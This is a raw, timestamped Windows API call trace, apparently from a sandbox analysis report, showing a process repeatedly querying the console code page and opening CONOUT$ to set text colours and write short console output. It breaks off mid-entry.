[0152.298] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.298] GetLastError () returned 0xcb [0152.298] GetConsoleOutputCP () returned 0x1b5 [0152.298] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.298] GetLastError () returned 0xcb [0152.298] GetConsoleOutputCP () returned 0x1b5 [0152.298] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.298] GetLastError () returned 0xcb [0152.298] GetConsoleOutputCP () returned 0x1b5 [0152.298] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.298] GetLastError () returned 0xcb [0152.298] GetConsoleOutputCP () returned 0x1b5 [0152.298] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.298] GetLastError () returned 0xcb [0152.298] GetConsoleOutputCP () returned 0x1b5 [0152.298] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.298] GetLastError () returned 0xcb [0152.298] GetConsoleOutputCP () returned 0x1b5 [0152.298] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.298] GetLastError () returned 0xcb [0152.299] GetConsoleOutputCP () returned 0x1b5 [0152.299] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.299] GetLastError () returned 0xcb [0152.299] GetConsoleOutputCP () returned 0x1b5 [0152.299] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.299] GetLastError () returned 0xcb [0152.299] GetConsoleOutputCP () returned 0x1b5 [0152.299] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.299] GetLastError () returned 0xcb [0152.299] GetConsoleOutputCP () returned 0x1b5 [0152.299] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.299] GetLastError () returned 0xcb [0152.299] GetConsoleOutputCP () returned 0x1b5 [0152.299] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.299] GetLastError () returned 0xcb [0152.299] GetConsoleOutputCP () returned 0x1b5 [0152.299] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.299] GetLastError () returned 0xcb [0152.299] GetConsoleOutputCP () returned 0x1b5 [0152.299] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.299] GetLastError () returned 0xcb [0152.299] GetConsoleOutputCP () returned 0x1b5 [0152.300] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.300] GetLastError () returned 0xcb [0152.300] GetConsoleOutputCP () returned 0x1b5 [0152.300] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.300] GetLastError () returned 0xcb [0152.300] GetConsoleOutputCP () returned 0x1b5 [0152.300] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.300] GetLastError () returned 0xcb [0152.300] GetConsoleOutputCP () returned 0x1b5 [0152.300] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.300] GetLastError () returned 0xcb [0152.300] GetConsoleOutputCP () returned 0x1b5 [0152.300] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.300] GetLastError () returned 0xcb [0152.300] GetConsoleOutputCP () returned 0x1b5 [0152.300] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.300] GetLastError () returned 0xcb [0152.300] GetConsoleOutputCP () returned 0x1b5 [0152.300] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.300] GetLastError () returned 0xcb [0152.300] GetConsoleOutputCP () returned 0x1b5 [0152.300] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.300] GetLastError () returned 0xcb [0152.300] GetConsoleOutputCP () returned 0x1b5 [0152.301] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.301] GetLastError () returned 0xcb [0152.301] GetConsoleOutputCP () returned 0x1b5 [0152.301] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.301] GetLastError () returned 0xcb [0152.301] GetConsoleOutputCP () returned 0x1b5 [0152.301] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.301] GetLastError () returned 0xcb [0152.301] GetConsoleOutputCP () returned 0x1b5 [0152.301] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.301] GetLastError () returned 0xcb [0152.301] GetConsoleOutputCP () returned 0x1b5 [0152.301] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.301] GetLastError () returned 0xcb [0152.301] GetConsoleOutputCP () returned 0x1b5 [0152.301] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.301] GetLastError () returned 0xcb [0152.301] GetConsoleOutputCP () returned 0x1b5 [0152.301] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.301] GetLastError () returned 0xcb [0152.301] GetConsoleOutputCP () returned 0x1b5 [0152.302] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.302] GetLastError () returned 0xcb [0152.302] GetConsoleOutputCP () returned 0x1b5 [0152.302] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.302] GetLastError () returned 0xcb [0152.302] GetConsoleOutputCP () returned 0x1b5 [0152.302] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.302] GetLastError () returned 0xcb [0152.302] GetConsoleOutputCP () returned 0x1b5 [0152.302] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.302] GetLastError () returned 0xcb [0152.302] GetConsoleOutputCP () returned 0x1b5 [0152.302] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.302] GetLastError () returned 0xcb [0152.302] GetConsoleOutputCP () returned 0x1b5 [0152.302] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.302] GetLastError () returned 0xcb [0152.302] GetConsoleOutputCP () returned 0x1b5 [0152.302] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.302] GetLastError () returned 0xcb [0152.302] GetConsoleOutputCP () returned 0x1b5 [0152.302] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.303] GetLastError () returned 0xcb [0152.303] GetConsoleOutputCP () returned 0x1b5 [0152.303] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea70, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea70) returned 0 [0152.303] GetLastError () returned 0xcb [0152.303] GetConsoleOutputCP () returned 0x1b5 [0152.303] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea70, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea70) returned 0 [0152.303] GetLastError () returned 0xcb [0152.303] GetConsoleOutputCP () returned 0x1b5 [0152.303] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea70, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea70) returned 0 [0152.303] GetLastError () returned 0xcb [0152.308] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17 [0152.365] GetLastError () returned 0xcb [0152.365] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x17, lpConsoleScreenBufferInfo=0x5d8ea48 | out: lpConsoleScreenBufferInfo=0x5d8ea48) returned 1 [0152.365] GetLastError () returned 0xcb [0152.365] GetConsoleOutputCP () returned 0x1b5 [0152.365] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.365] GetLastError () returned 0xcb [0152.457] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0152.457] GetLastError () returned 0xcb [0152.457] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x5d8eac0 | out: lpMode=0x5d8eac0) returned 1 [0152.458] GetLastError () returned 0xcb [0152.462] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b [0152.462] GetLastError () returned 0xcb [0152.462] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x1b, lpConsoleScreenBufferInfo=0x5d8e9e8 | out: lpConsoleScreenBufferInfo=0x5d8e9e8) returned 1 [0152.463] GetLastError () returned 0xcb [0152.466] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f [0152.466] GetLastError () returned 0xcb [0152.466] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x1f, lpConsoleScreenBufferInfo=0x5d8e9e8 | out: lpConsoleScreenBufferInfo=0x5d8e9e8) returned 1 [0152.466] GetLastError () returned 0xcb [0152.470] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x23 [0152.470] GetLastError () returned 0xcb [0152.470] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x23, lpConsoleScreenBufferInfo=0x5d8e9f0 | out: lpConsoleScreenBufferInfo=0x5d8e9f0) returned 1 [0152.470] GetLastError () returned 0xcb [0152.471] SetConsoleTextAttribute (hConsoleOutput=0x23, wAttributes=0xc) returned 1 [0152.472] GetLastError () returned 0xcb [0152.474] CloseHandle (hObject=0x23) returned 1 [0152.474] GetLastError () returned 0xcb [0152.477] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x23 [0152.477] GetLastError () returned 0xcb [0152.477] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x23, lpConsoleScreenBufferInfo=0x5d8e9f0 | out: lpConsoleScreenBufferInfo=0x5d8e9f0) returned 1 [0152.478] GetLastError () returned 0xcb [0152.478] SetConsoleTextAttribute (hConsoleOutput=0x23, wAttributes=0xc) returned 1 [0152.478] GetLastError () returned 0xcb [0152.478] CloseHandle (hObject=0x23) returned 1 [0152.478] GetLastError () returned 0xcb [0152.478] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0152.479] GetLastError () returned 0xcb [0152.479] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x5d8ea58 | out: lpMode=0x5d8ea58) returned 1 [0152.479] GetLastError () returned 0xcb [0152.482] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x23 [0152.482] GetLastError () returned 0xcb [0152.482] GetConsoleMode (in: hConsoleHandle=0x23, lpMode=0x5d8ea3c | out: lpMode=0x5d8ea3c) returned 1 [0152.482] GetLastError () returned 0xcb [0152.493] WriteConsoleW (in: hConsoleOutput=0x23, lpBuffer=0x2e999c0*, nNumberOfCharsToWrite=0x4f, lpNumberOfCharsWritten=0x5d8ea3c, lpReserved=0x0 | out: lpBuffer=0x2e999c0*, lpNumberOfCharsWritten=0x5d8ea3c*=0x4f) returned 1 [0152.529] GetLastError () returned 0xcb [0152.529] CloseHandle (hObject=0x23) returned 1 [0152.530] GetLastError () returned 0xcb [0152.533] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x23 [0152.533] GetLastError () returned 0xcb [0152.533] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x23, lpConsoleScreenBufferInfo=0x5d8e9ec | out: lpConsoleScreenBufferInfo=0x5d8e9ec) returned 1 [0152.533] GetLastError () returned 0xcb [0152.533] SetConsoleTextAttribute (hConsoleOutput=0x23, wAttributes=0x7) returned 1 [0152.533] GetLastError () returned 0xcb [0152.533] CloseHandle (hObject=0x23) returned 1 [0152.534] GetLastError () returned 0xcb [0152.536] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x23 [0152.536] GetLastError () returned 0xcb [0152.536] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x23, lpConsoleScreenBufferInfo=0x5d8e9ec | out: lpConsoleScreenBufferInfo=0x5d8e9ec) returned 1 [0152.537] GetLastError () returned 0xcb [0152.537] SetConsoleTextAttribute (hConsoleOutput=0x23, wAttributes=0x7) returned 1 [0152.537] GetLastError () returned 0xcb [0152.537] CloseHandle (hObject=0x23) returned 1 [0152.537] GetLastError () returned 0xcb [0152.540] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x23 [0152.540] GetLastError () returned 0xcb [0152.540] GetConsoleMode (in: hConsoleHandle=0x23, lpMode=0x5d8ea7c | out: lpMode=0x5d8ea7c) returned 1 [0152.540] GetLastError () returned 0xcb [0152.540] WriteConsoleW (in: hConsoleOutput=0x23, lpBuffer=0x2bd9938*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x5d8ea7c, lpReserved=0x0 | out: lpBuffer=0x2bd9938*, lpNumberOfCharsWritten=0x5d8ea7c*=0x1) returned 1 [0152.541] GetLastError () returned 0xcb [0152.541] CloseHandle (hObject=0x23) returned 1 [0152.541] GetLastError () returned 0xcb [0152.544] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x23 [0152.544] GetLastError () returned 0xcb [0152.544] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x23, lpConsoleScreenBufferInfo=0x5d8ea48 | out: lpConsoleScreenBufferInfo=0x5d8ea48) returned 1 [0152.544] GetLastError () returned 0xcb [0152.544] GetConsoleOutputCP () returned 0x1b5 [0152.544] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.544] GetLastError () returned 0xcb [0152.548] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x27 [0152.548] GetLastError () returned 0xcb [0152.548] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x27, lpConsoleScreenBufferInfo=0x5d8e9e8 | out: lpConsoleScreenBufferInfo=0x5d8e9e8) returned 1 [0152.548] GetLastError () returned 0xcb [0152.551] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b [0152.551] GetLastError () returned 0xcb [0152.551] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x2b, lpConsoleScreenBufferInfo=0x5d8e9e8 | out: lpConsoleScreenBufferInfo=0x5d8e9e8) returned 1 [0152.551] GetLastError () returned 0xcb [0152.554] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f [0152.554] GetLastError () returned 0xcb [0152.554] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x2f, lpConsoleScreenBufferInfo=0x5d8e9f0 | out: lpConsoleScreenBufferInfo=0x5d8e9f0) returned 1 [0152.554] GetLastError () returned 0xcb [0152.554] SetConsoleTextAttribute (hConsoleOutput=0x2f, wAttributes=0xc) returned 1 [0152.554] GetLastError () returned 0xcb [0152.554] CloseHandle (hObject=0x2f) returned 1 [0152.555] GetLastError () returned 0xcb [0152.557] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f [0152.558] GetLastError () returned 0xcb [0152.558] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x2f, lpConsoleScreenBufferInfo=0x5d8e9f0 | out: lpConsoleScreenBufferInfo=0x5d8e9f0) returned 1 [0152.558] GetLastError () returned 0xcb [0152.558] SetConsoleTextAttribute (hConsoleOutput=0x2f, wAttributes=0xc) returned 1 [0152.558] GetLastError () returned 0xcb [0152.558] CloseHandle (hObject=0x2f) returned 1 [0152.558] GetLastError () returned 0xcb [0152.561] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f [0152.561] GetLastError () returned 0xcb [0152.561] GetConsoleMode (in: hConsoleHandle=0x2f, lpMode=0x5d8ea3c | out: lpMode=0x5d8ea3c) returned 1 [0152.561] GetLastError () returned 0xcb [0152.561] WriteConsoleW (in: hConsoleOutput=0x2f, lpBuffer=0x2e9a0e4*, nNumberOfCharsToWrite=0x4f, lpNumberOfCharsWritten=0x5d8ea3c, lpReserved=0x0 | out: lpBuffer=0x2e9a0e4*, lpNumberOfCharsWritten=0x5d8ea3c*=0x4f) returned 1 [0152.562] GetLastError () returned 0xcb [0152.562] CloseHandle (hObject=0x2f) returned 1 [0152.563] GetLastError () returned 0xcb [0152.566] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f [0152.602] GetLastError () returned 0xcb [0152.602] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x2f, lpConsoleScreenBufferInfo=0x5d8e9ec | out: lpConsoleScreenBufferInfo=0x5d8e9ec) returned 1 [0152.602] GetLastError () returned 0xcb [0152.602] SetConsoleTextAttribute (hConsoleOutput=0x2f, wAttributes=0x7) returned 1 [0152.602] GetLastError () returned 0xcb [0152.602] CloseHandle (hObject=0x2f) returned 1 [0152.602] GetLastError () returned 0xcb [0152.605] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f [0152.606] GetLastError () returned 0xcb [0152.606] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x2f, lpConsoleScreenBufferInfo=0x5d8e9ec | out: lpConsoleScreenBufferInfo=0x5d8e9ec) returned 1 [0152.606] GetLastError () returned 0xcb [0152.606] SetConsoleTextAttribute (hConsoleOutput=0x2f, wAttributes=0x7) returned 1 [0152.606] GetLastError () returned 0xcb [0152.606] CloseHandle (hObject=0x2f) returned 1 [0152.607] GetLastError () returned 0xcb [0152.610] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f [0152.610] GetLastError () returned 0xcb [0152.610] GetConsoleMode (in: hConsoleHandle=0x2f, lpMode=0x5d8ea7c | out: lpMode=0x5d8ea7c) returned 1 [0152.610] GetLastError () returned 0xcb [0152.610] WriteConsoleW (in: hConsoleOutput=0x2f, lpBuffer=0x2bd9938*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x5d8ea7c, lpReserved=0x0 | out: lpBuffer=0x2bd9938*, lpNumberOfCharsWritten=0x5d8ea7c*=0x1) returned 1 [0152.610] GetLastError () returned 0xcb [0152.610] CloseHandle (hObject=0x2f) returned 1 [0152.611] GetLastError () returned 0xcb [0152.614] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f [0152.614] GetLastError () returned 0xcb [0152.614] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x2f, lpConsoleScreenBufferInfo=0x5d8ea48 | out: lpConsoleScreenBufferInfo=0x5d8ea48) returned 1 [0152.614] GetLastError () returned 0xcb [0152.614] GetConsoleOutputCP () returned 0x1b5 [0152.614] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.614] GetLastError () returned 0xcb [0152.618] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x33 [0152.618] GetLastError () returned 0xcb [0152.618] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x33, lpConsoleScreenBufferInfo=0x5d8e9e8 | out: lpConsoleScreenBufferInfo=0x5d8e9e8) returned 1 [0152.618] GetLastError () returned 0xcb [0152.621] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37 [0152.621] GetLastError () returned 0xcb [0152.621] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x37, lpConsoleScreenBufferInfo=0x5d8e9e8 | out: lpConsoleScreenBufferInfo=0x5d8e9e8) returned 1 [0152.621] GetLastError () returned 0xcb [0152.625] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b [0152.625] GetLastError () returned 0xcb [0152.625] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x3b, lpConsoleScreenBufferInfo=0x5d8e9f0 | out: lpConsoleScreenBufferInfo=0x5d8e9f0) returned 1 [0152.625] GetLastError () returned 0xcb [0152.625] SetConsoleTextAttribute (hConsoleOutput=0x3b, wAttributes=0xc) returned 1 [0152.625] GetLastError () returned 0xcb [0152.625] CloseHandle (hObject=0x3b) returned 1 [0152.625] GetLastError () returned 0xcb [0152.629] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b [0152.629] GetLastError () returned 0xcb [0152.629] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x3b, lpConsoleScreenBufferInfo=0x5d8e9f0 | out: lpConsoleScreenBufferInfo=0x5d8e9f0) returned 1 [0152.629] GetLastError () returned 0xcb [0152.629] SetConsoleTextAttribute (hConsoleOutput=0x3b, wAttributes=0xc) returned 1 [0152.629] GetLastError () returned 0xcb [0152.629] CloseHandle (hObject=0x3b) returned 1 [0152.629] GetLastError () returned 0xcb [0152.632] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b [0152.633] GetLastError () returned 0xcb [0152.633] GetConsoleMode (in: hConsoleHandle=0x3b, lpMode=0x5d8ea3c | out: lpMode=0x5d8ea3c) returned 1 [0152.633] GetLastError () returned 0xcb [0152.633] WriteConsoleW (in: hConsoleOutput=0x3b, lpBuffer=0x2e9a614*, nNumberOfCharsToWrite=0x3e, lpNumberOfCharsWritten=0x5d8ea3c, lpReserved=0x0 | out: lpBuffer=0x2e9a614*, lpNumberOfCharsWritten=0x5d8ea3c*=0x3e) returned 1 [0152.633] GetLastError () returned 0xcb [0152.633] CloseHandle (hObject=0x3b) returned 1 [0152.633] GetLastError () returned 0xcb [0152.636] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b [0152.672] GetLastError () returned 0xcb [0152.672] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x3b, lpConsoleScreenBufferInfo=0x5d8e9ec | out: lpConsoleScreenBufferInfo=0x5d8e9ec) returned 1 [0152.672] GetLastError () returned 0xcb [0152.672] SetConsoleTextAttribute (hConsoleOutput=0x3b, wAttributes=0x7) returned 1 [0152.672] GetLastError () returned 0xcb [0152.672] CloseHandle (hObject=0x3b) returned 1 [0152.672] GetLastError () returned 0xcb [0152.675] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 